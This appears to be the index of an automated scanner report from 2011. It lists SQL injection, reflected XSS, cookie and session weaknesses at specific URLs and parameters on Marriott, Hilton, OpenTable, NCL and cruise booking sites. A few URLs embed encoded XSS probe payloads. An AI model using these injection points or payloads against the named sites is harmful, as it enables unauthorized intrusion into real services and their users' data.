XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10032011-02

RXSS Profile of Travel Industry Search Forms

Report generated by XSS.CX at Mon Oct 03 09:26:56 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. SQL injection

1.1. http://metrics.marriott.com/b/ss/marriottglobal/1/H.20.2/s45922061523888 [REST URL parameter 2]

1.2. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0 [REST URL parameter 5]

1.3. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s41395109691657 [REST URL parameter 4]

1.4. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s45203784920740 [REST URL parameter 3]

1.5. http://www.opentable.com/irp/jquery/js/ScriptHandler.ashx [REST URL parameter 4]

1.6. http://www.opentable.com/jaspers-corner-tap-and-kitchen [REST URL parameter 1]

1.7. http://www.opentable.com/jscripts/ScriptHandler.ashx [REST URL parameter 2]

1.8. http://www3.hilton.com/en_US/hi/search/findhotels/results.htm [ClrSCD cookie]

2. XPath injection

3. HTTP header injection

4. Cross-site scripting (reflected)

4.1. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 2]

4.2. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 3]

4.3. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 4]

4.4. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [name of an arbitrarily supplied request parameter]

4.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 2]

4.6. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 3]

4.7. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 4]

4.8. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 2]

4.9. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 3]

4.10. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 4]

4.11. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 2]

4.12. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 3]

4.13. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 4]

4.14. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 2]

4.15. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 3]

4.16. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 4]

4.17. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 2]

4.18. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 3]

4.19. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 4]

4.20. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3 [REST URL parameter 2]

4.21. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3 [REST URL parameter 3]

4.22. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3 [REST URL parameter 2]

4.23. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3 [REST URL parameter 3]

4.24. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 2]

4.25. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 3]

4.26. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 4]

4.27. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 5]

4.28. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 2]

4.29. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 3]

4.30. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 4]

4.31. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 5]

4.32. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 2]

4.33. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 3]

4.34. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 4]

4.35. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 2]

4.36. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 3]

4.37. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 4]

4.38. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 5]

4.39. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 2]

4.40. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 3]

4.41. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 4]

4.42. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 5]

4.43. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard [mbox parameter]

4.44. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard [mboxId parameter]

4.45. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard [mbox parameter]

4.46. http://www.celebritycruises.com/explore/ships/detail.do [tab parameter]

4.47. http://www.cruises.com/ajaxjson/filterdynamic.do [changedDdl parameter]

4.48. http://www.cruises.com/results.do [name of an arbitrarily supplied request parameter]

4.49. http://www.cruisesonly.com/ajaxjson/filterdynamic.do [changedDdl parameter]

4.50. http://www.marriott.com/search/submitSearch.mi [clusterCode parameter]

4.51. http://www.marriott.com/search/submitSearch.mi [clusterCode parameter]

4.52. http://www.marriott.com/search/submitSearch.mi [displayableIncentiveType_Number parameter]

4.53. http://www.marriott.com/search/submitSearch.mi [fromDate parameter]

4.54. http://www.marriott.com/search/submitSearch.mi [toDate parameter]

4.55. https://www.marriott.com/reservation/availabilitySearch.mi [displayableIncentiveType_Number parameter]

4.56. http://www.opentable.com/interim.aspx [d parameter]

4.57. http://www.opentable.com/interim.aspx [name of an arbitrarily supplied request parameter]

4.58. http://www.opentable.com/interim.aspx [p parameter]

4.59. http://www.opentable.com/interim.aspx [restref parameter]

4.60. http://www.opentable.com/interim.aspx [rid parameter]

4.61. http://www.opentable.com/interim.aspx [rtype parameter]

4.62. http://www.opentable.com/interim.aspx [t parameter]

4.63. http://www.opentable.com/opentables.aspx [d parameter]

4.64. http://www.opentable.com/opentables.aspx [name of an arbitrarily supplied request parameter]

4.65. http://www.opentable.com/opentables.aspx [p parameter]

4.66. http://www.opentable.com/opentables.aspx [restref parameter]

4.67. http://www.opentable.com/opentables.aspx [rid parameter]

4.68. http://www.opentable.com/opentables.aspx [rtype parameter]

4.69. http://www.opentable.com/opentables.aspx [t parameter]

4.70. http://www.opentable.com/restaurant-search.aspx [PartySize parameter]

4.71. http://www.opentable.com/restaurant-search.aspx [ResTime parameter]

4.72. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do [REST URL parameter 4]

4.73. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do [REST URL parameter 4]

4.74. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do [REST URL parameter 4]

4.75. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do [REST URL parameter 4]

4.76. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do [REST URL parameter 4]

4.77. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do [REST URL parameter 4]

4.78. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do [REST URL parameter 4]

4.79. https://www2.ncl.com/vacations [REST URL parameter 1]

4.80. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm [arrivalDate parameter]

4.81. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm [departureDate parameter]

4.82. http://www3.hilton.com/es/hi/doxch.htm [name of an arbitrarily supplied request parameter]

4.83. http://www3.hilton.com/fr/hi/doxch.htm [name of an arbitrarily supplied request parameter]

4.84. http://www.celebritycruises.com/explore/ships/detail.do [JSESSIONID cookie]

4.85. http://www.celebritycruises.com/search/loadCruiseConfigurator.do [JSESSIONID cookie]

4.86. http://www.celebritycruises.com/search/vacationSearchResults.do [JSESSIONID cookie]

4.87. http://www.opentable.com/interim.aspx [lsCKE cookie]

4.88. http://www.opentable.com/interim.aspx [lsCKE cookie]

4.89. http://www.opentable.com/opentables.aspx [lsCKE cookie]

4.90. http://www.opentable.com/opentables.aspx [lsCKE cookie]

4.91. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]

4.92. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]

4.93. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]

4.94. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]

5. Flash cross-domain policy

5.1. http://as00.estara.com/crossdomain.xml

5.2. http://dev.virtualearth.net/crossdomain.xml

5.3. http://ecn.dev.virtualearth.net/crossdomain.xml

5.4. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

5.5. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

5.6. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

5.7. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

5.8. http://g-pixel.invitemedia.com/crossdomain.xml

5.9. http://ib.adnxs.com/crossdomain.xml

5.10. http://marriottinternationa.tt.omtrdc.net/crossdomain.xml

5.11. http://metrics.marriott.com/crossdomain.xml

5.12. http://o.opentable.com/crossdomain.xml

5.13. http://opentable.tt.omtrdc.net/crossdomain.xml

5.14. http://opentable.ugc.bazaarvoice.com/crossdomain.xml

5.15. http://reviews.opentable.com/crossdomain.xml

5.16. https://www2.ncl.com/crossdomain.xml

5.17. http://www.opentable.com/crossdomain.xml

5.18. https://www201.americanexpress.com/crossdomain.xml

5.19. http://cache.marriott.com/crossdomain.xml

5.20. http://www.marriott.com/crossdomain.xml

5.21. https://www.marriott.com/crossdomain.xml

5.22. http://www.marriottvacationclub.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://dev.virtualearth.net/clientaccesspolicy.xml

6.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

6.3. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

6.4. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

6.5. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

6.6. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

6.7. http://metrics.marriott.com/clientaccesspolicy.xml

6.8. http://o.opentable.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://www.kimptonhotels.com/

7.2. http://www.kimptonhotels.com/intouch/KIT_overview.aspx

7.3. http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx

7.4. http://www.kimptonhotels.com/restaurants/restaurants.aspx

7.5. http://www1.hilton.com/en_US/hi/customersupport/feedback.do

7.6. http://www1.hilton.com/en_US/hi/customersupport/index.do

7.7. http://www1.hilton.com/en_US/hi/customersupport/local-reservations.do

7.8. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

7.9. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

7.10. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

7.11. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

7.12. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

7.13. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

7.14. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

7.15. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

7.16. http://www1.hilton.com/en_US/hi/index.do

7.17. http://www1.hilton.com/en_US/hi/index.do

7.18. http://www1.hilton.com/en_US/hi/sitemap/index.do

8. SSL cookie without secure flag set

8.1. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry

8.2. https://www.cruisesonly.com/bcss/default.asp

8.3. https://www.marriott.com/!crd_prm!.!cm

8.4. https://www.marriott.com/default.mi

8.5. https://www.marriott.com/reservation/availability.mi

8.6. https://www.marriott.com/reservation/availabilitySearch.mi

8.7. https://www.marriott.com/reservation/cleanSession.mi

8.8. https://www.marriott.com/reservation/expiredSession.mi

8.9. https://www.marriott.com/reservation/rateListMenu.mi

8.10. https://www2.ncl.com/vacations

9. Session token in URL

9.1. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

9.2. http://hiltonworldwide.hilton.com/en/ww/ourbestrates/claimform.jhtml

9.3. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

9.4. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard

9.5. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard

9.6. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard

9.7. https://secure.hilton.com/en/hhonors/signup/hhonors_enroll.jhtml

9.8. https://secure.hilton.com/en/hi/login/login.jhtml

9.9. https://secure.hilton.com/en/hi/login/login.jhtml

9.10. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml

9.11. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml

9.12. https://secure3.hilton.com/en_US/hi/reservation/book.htm

9.13. https://secure3.hilton.com/en_US/hi/reservation/book.htm

9.14. http://vdassets.bitgravity.com/embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json

9.15. http://www.hilton.com/en/hi/brand/about.jhtml

9.16. http://www.hilton.com/en/hi/info/site_usage.jhtml

9.17. http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html

9.18. http://www.ncl.com/nclweb/cbooking/submitCruiseDetailsForm.html

9.19. http://www1.hilton.com/en_US/hh/home_index.do

9.20. http://www1.hilton.com/en_US/hi/customersupport/index.do

9.21. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

9.22. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

9.23. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

9.24. http://www1.hilton.com/en_US/hi/index.do

9.25. http://www1.hilton.com/en_US/hi/sitemap/index.do

9.26. http://www3.hilton.com/en_US/ch/doxch.htm

9.27. http://www3.hilton.com/en_US/dt/doxch.htm

9.28. http://www3.hilton.com/en_US/es/doxch.htm

9.29. http://www3.hilton.com/en_US/gi/doxch.htm

9.30. http://www3.hilton.com/en_US/hh/doxch.htm

9.31. http://www3.hilton.com/en_US/hi/doxch.htm

9.32. http://www3.hilton.com/en_US/hp/doxch.htm

9.33. http://www3.hilton.com/en_US/ht/doxch.htm

9.34. http://www3.hilton.com/en_US/hw/doxch.htm

9.35. http://www3.hilton.com/en_US/wa/doxch.htm

9.36. http://www3.hilton.com/es/hi/doxch.htm

9.37. http://www3.hilton.com/fr/hi/doxch.htm

10. SSL certificate

10.1. https://secure2.hilton.com/

10.2. https://wwwa.applyonlinenow.com/

10.3. https://secure.hilton.com/

10.4. https://secure3.hilton.com/

10.5. https://www.marriott.com/

10.6. https://www.marriottregistry.com/

10.7. https://www2.ncl.com/

10.8. https://www201.americanexpress.com/

11. Cookie scoped to parent domain

11.1. http://www.royalcaribbean.com/

11.2. http://www3.hilton.com/en_US/hi/search/findhotels/passiveSearch.htm

11.3. http://b.scorecardresearch.com/p

11.4. http://bstats.adbrite.com/adserver/behavioral-data/0

11.5. http://id.google.com/verify/EAAAAMspK6l-6mI9iMP5vGnYNYo.gif

11.6. http://leadback.advertising.com/adcedge/lb

11.7. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0

11.8. http://pixel.traveladvertising.com/Live/Pixel.aspx

11.9. http://r.turn.com/r/beacon

11.10. http://servedby.flashtalking.com/segment/modify/ah3

11.11. http://servedby.flashtalking.com/segment/modify/ahr

11.12. http://tracker.marinsm.com/tp

11.13. https://www.cruisesonly.com/bcss/default.asp

11.14. http://www.opentable.com/

11.15. http://www.opentable.com/frontdoor/default.aspx

11.16. http://www.opentable.com/info/aboutus.aspx

11.17. http://www.opentable.com/interim.aspx

11.18. http://www.opentable.com/jaspers-corner-tap-and-kitchen

11.19. http://www.opentable.com/opentables.aspx

11.20. http://www.opentable.com/restaurant-search.aspx

11.21. http://www2.ncl.com/

11.22. http://www2.ncl.com/about/careers/overview

11.23. http://www2.ncl.com/about/contact-us

11.24. http://www2.ncl.com/about/environmental-commitment

11.25. http://www2.ncl.com/about/staying-connected-sea-internet-access

11.26. http://www2.ncl.com/cruise-destinations

11.27. http://www2.ncl.com/destination/canada_new_engl/hotel

11.28. http://www2.ncl.com/destination/canada_new_engl/ports/map

11.29. http://www2.ncl.com/destination/canada_new_engl/questions

11.30. http://www2.ncl.com/destination/canada_new_engl/stories

11.31. http://www2.ncl.com/destination/canada_new_engl/vacations

11.32. http://www2.ncl.com/destination/caribbean/excursions

11.33. http://www2.ncl.com/destination/caribbean/hotel

11.34. http://www2.ncl.com/destination/caribbean/overview

11.35. http://www2.ncl.com/destination/caribbean/ports/map

11.36. http://www2.ncl.com/destination/caribbean/questions

11.37. http://www2.ncl.com/destination/caribbean/stories

11.38. http://www2.ncl.com/destination/caribbean/vacations

11.39. http://www2.ncl.com/destination/europe/excursions

11.40. http://www2.ncl.com/destination/europe/hotel

11.41. http://www2.ncl.com/destination/europe/overview

11.42. http://www2.ncl.com/destination/europe/ports/map

11.43. http://www2.ncl.com/destination/europe/questions

11.44. http://www2.ncl.com/destination/europe/stories

11.45. http://www2.ncl.com/destination/europe/vacations

11.46. http://www2.ncl.com/destination/hawaii/excursions

11.47. http://www2.ncl.com/destination/hawaii/hotel

11.48. http://www2.ncl.com/destination/hawaii/overview

11.49. http://www2.ncl.com/destination/hawaii/ports/map

11.50. http://www2.ncl.com/destination/hawaii/questions

11.51. http://www2.ncl.com/destination/hawaii/stories

11.52. http://www2.ncl.com/destination/hawaii/vacations

11.53. http://www2.ncl.com/destination/pacific_coastal/excursions

11.54. http://www2.ncl.com/destination/pacific_coastal/hotel

11.55. http://www2.ncl.com/destination/pacific_coastal/overview

11.56. http://www2.ncl.com/destination/pacific_coastal/ports/map

11.57. http://www2.ncl.com/destination/pacific_coastal/questions

11.58. http://www2.ncl.com/destination/pacific_coastal/stories

11.59. http://www2.ncl.com/destination/pacific_coastal/vacations

11.60. http://www2.ncl.com/destination/panama_canal/excursions

11.61. http://www2.ncl.com/destination/panama_canal/hotel

11.62. http://www2.ncl.com/destination/panama_canal/overview

11.63. http://www2.ncl.com/destination/panama_canal/ports/map

11.64. http://www2.ncl.com/destination/panama_canal/questions

11.65. http://www2.ncl.com/destination/panama_canal/stories

11.66. http://www2.ncl.com/faq

11.67. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts

11.68. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview

11.69. http://www2.ncl.com/freestyle-cruise/cruise-rewards

11.70. http://www2.ncl.com/freestyle-cruise/freestyle-accommodations

11.71. http://www2.ncl.com/freestyle-cruise/freestyle-dining

11.72. http://www2.ncl.com/freestyle-cruise/freestyle-family-fun/overview

11.73. http://www2.ncl.com/freestyle-cruise/golf/overview

11.74. http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages

11.75. http://www2.ncl.com/freestyle-cruise/nickelodeon

11.76. http://www2.ncl.com/freestyle-cruise/onboard-experience

11.77. http://www2.ncl.com/freestyle-cruise/overview

11.78. http://www2.ncl.com/freestyle-cruise/spa

11.79. http://www2.ncl.com/freestyle-cruise/spa-sports-and-fitness

11.80. http://www2.ncl.com/ncl_inside_scoop

11.81. http://www2.ncl.com/sitemap

11.82. https://www2.ncl.com/vacations

12. Cookie without HttpOnly flag set

12.1. http://vacations.rooms.com/wthrooms/CPCSS

12.2. http://vacations.rooms.com/wthrooms/CPGateway

12.3. http://vacations.rooms.com/wthrooms/CPMerchandisingPage

12.4. http://vacations.rooms.com/wthrooms/CPScreenMessageCSS

12.5. http://vacations.rooms.com/wthrooms/HotelDetails

12.6. http://vacations.rooms.com/wthrooms/Search

12.7. http://www.cruisesonly.com/cs/default.asp

12.8. http://www.hilton.com/

12.9. http://www.ncl.com/nclweb/cbooking/submitCruiseDetailsForm.html

12.10. http://www.rooms.com/favicon.ico

12.11. http://www.royalcaribbean.com/

12.12. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

12.13. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

12.14. http://www1.hilton.com/en_US/hi/index.do

12.15. http://www1.hilton.com/en_US/hi/sitemap/index.do

12.16. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry

12.17. http://b.scorecardresearch.com/p

12.18. http://bstats.adbrite.com/adserver/behavioral-data/0

12.19. http://ctix8.cheaptickets.com/dcsrbjuh3vz5bde9exdeyiy5l_8c1r/dcs.gif

12.20. http://leadback.advertising.com/adcedge/lb

12.21. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard

12.22. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard

12.23. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0

12.24. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard

12.25. http://pixel.traveladvertising.com/Live/Pixel.aspx

12.26. http://r.turn.com/r/beacon

12.27. http://servedby.flashtalking.com/segment/modify/ah3

12.28. http://servedby.flashtalking.com/segment/modify/ahr

12.29. http://statse.webtrendslive.com/DCSKIoc2rNH8I36lrbe6wexE5_5B9O/dcs.gif

12.30. http://statse.webtrendslive.com/dcsu0n3ra10000g4qrzwkeqml_4q6w/dcs.gif

12.31. http://statse.webtrendslive.com/dcsx8czs1erp17368wkcsn8pc_9z2q/dcs.gif

12.32. http://statse.webtrendslive.com/dcsx8czs1erp17368wkcsn8pc_9z2q/njs.gif

12.33. http://tracker.marinsm.com/tp

12.34. http://www.cruises.com/

12.35. http://www.cruises.com/ajaxhtml/filterdynamic.do

12.36. http://www.cruises.com/ajaxjson/filterdynamic.do

12.37. http://www.cruises.com/cs/default.asp

12.38. http://www.cruises.com/i/shadow.png

12.39. http://www.cruises.com/idle.do

12.40. http://www.cruises.com/mailing.do

12.41. http://www.cruises.com/promotion/balcony-suite-cruises.do

12.42. http://www.cruises.com/promotion/weekend-cruises.do

12.43. http://www.cruises.com/results.do

12.44. http://www.cruises.com/sc.do

12.45. http://www.cruises.com/vistracker.do

12.46. http://www.cruisesonly.com/ajaxhtml/filterdynamic.do

12.47. http://www.cruisesonly.com/ajaxjson/filterdynamic.do

12.48. http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp

12.49. http://www.cruisesonly.com/lib/javascript/ajax/logerror.js

12.50. http://www.cruisesonly.com/promotion/bermuda-cruises.do

12.51. http://www.cruisesonly.com/sc.do

12.52. http://www.cruisesonly.com/sharedwidgets/Caribbean.do

12.53. https://www.cruisesonly.com/bcss/default.asp

12.54. http://www.marriott.com/!crd_prm!.!cm

12.55. http://www.marriott.com/default.mi

12.56. http://www.marriott.com/search/a

12.57. http://www.marriott.com/search/findHotels.mi

12.58. http://www.marriott.com/search/submitSearch.mi

12.59. https://www.marriott.com/!crd_prm!.!cm

12.60. https://www.marriott.com/default.mi

12.61. https://www.marriott.com/reservation/availability.mi

12.62. https://www.marriott.com/reservation/availabilitySearch.mi

12.63. https://www.marriott.com/reservation/cleanSession.mi

12.64. https://www.marriott.com/reservation/expiredSession.mi

12.65. https://www.marriott.com/reservation/rateListMenu.mi

12.66. http://www.marriottvacationclub.com/index.shtml

12.67. http://www.opentable.com/

12.68. http://www.opentable.com/frontdoor/default.aspx

12.69. http://www.opentable.com/info/aboutus.aspx

12.70. http://www.opentable.com/interim.aspx

12.71. http://www.opentable.com/jaspers-corner-tap-and-kitchen

12.72. http://www.opentable.com/opentables.aspx

12.73. http://www.opentable.com/restaurant-search.aspx

12.74. http://www1.hilton.com/

12.75. http://www1.hilton.com/doxch.do

12.76. http://www1.hilton.com/en_US/common/img/ui-bg_highlight-hard_100_f9f9f9_1x100.png

12.77. http://www1.hilton.com/en_US/hh/home_index.do

12.78. http://www1.hilton.com/en_US/hi/customersupport/feedback.do

12.79. http://www1.hilton.com/en_US/hi/customersupport/index.do

12.80. http://www1.hilton.com/en_US/hi/customersupport/local-reservations.do

12.81. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

12.82. http://www1.hilton.com/en_US/hi/homeNew.do

12.83. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

12.84. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

12.85. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

12.86. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

12.87. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

12.88. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Edc3906d35ca/a

12.89. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ee41feaea175/a

12.90. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/photoGallery.do

12.91. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/res-widget-to-gw.do

12.92. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH45db3%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E0f6e1a8e424/a

12.93. http://www1.hilton.com/ts/en_US/hi/jsp/inc_home_flash.xml

12.94. http://www2.ncl.com/

12.95. http://www2.ncl.com/about/careers/overview

12.96. http://www2.ncl.com/about/contact-us

12.97. http://www2.ncl.com/about/environmental-commitment

12.98. http://www2.ncl.com/about/staying-connected-sea-internet-access

12.99. http://www2.ncl.com/cruise-destinations

12.100. http://www2.ncl.com/destination/canada_new_engl/hotel

12.101. http://www2.ncl.com/destination/canada_new_engl/ports/map

12.102. http://www2.ncl.com/destination/canada_new_engl/questions

12.103. http://www2.ncl.com/destination/canada_new_engl/stories

12.104. http://www2.ncl.com/destination/canada_new_engl/vacations

12.105. http://www2.ncl.com/destination/caribbean/excursions

12.106. http://www2.ncl.com/destination/caribbean/hotel

12.107. http://www2.ncl.com/destination/caribbean/overview

12.108. http://www2.ncl.com/destination/caribbean/ports/map

12.109. http://www2.ncl.com/destination/caribbean/questions

12.110. http://www2.ncl.com/destination/caribbean/stories

12.111. http://www2.ncl.com/destination/caribbean/vacations

12.112. http://www2.ncl.com/destination/europe/excursions

12.113. http://www2.ncl.com/destination/europe/hotel

12.114. http://www2.ncl.com/destination/europe/overview

12.115. http://www2.ncl.com/destination/europe/ports/map

12.116. http://www2.ncl.com/destination/europe/questions

12.117. http://www2.ncl.com/destination/europe/stories

12.118. http://www2.ncl.com/destination/europe/vacations

12.119. http://www2.ncl.com/destination/hawaii/excursions

12.120. http://www2.ncl.com/destination/hawaii/hotel

12.121. http://www2.ncl.com/destination/hawaii/overview

12.122. http://www2.ncl.com/destination/hawaii/ports/map

12.123. http://www2.ncl.com/destination/hawaii/questions

12.124. http://www2.ncl.com/destination/hawaii/stories

12.125. http://www2.ncl.com/destination/hawaii/vacations

12.126. http://www2.ncl.com/destination/pacific_coastal/excursions

12.127. http://www2.ncl.com/destination/pacific_coastal/hotel

12.128. http://www2.ncl.com/destination/pacific_coastal/overview

12.129. http://www2.ncl.com/destination/pacific_coastal/ports/map

12.130. http://www2.ncl.com/destination/pacific_coastal/questions

12.131. http://www2.ncl.com/destination/pacific_coastal/stories

12.132. http://www2.ncl.com/destination/pacific_coastal/vacations

12.133. http://www2.ncl.com/destination/panama_canal/excursions

12.134. http://www2.ncl.com/destination/panama_canal/hotel

12.135. http://www2.ncl.com/destination/panama_canal/overview

12.136. http://www2.ncl.com/destination/panama_canal/ports/map

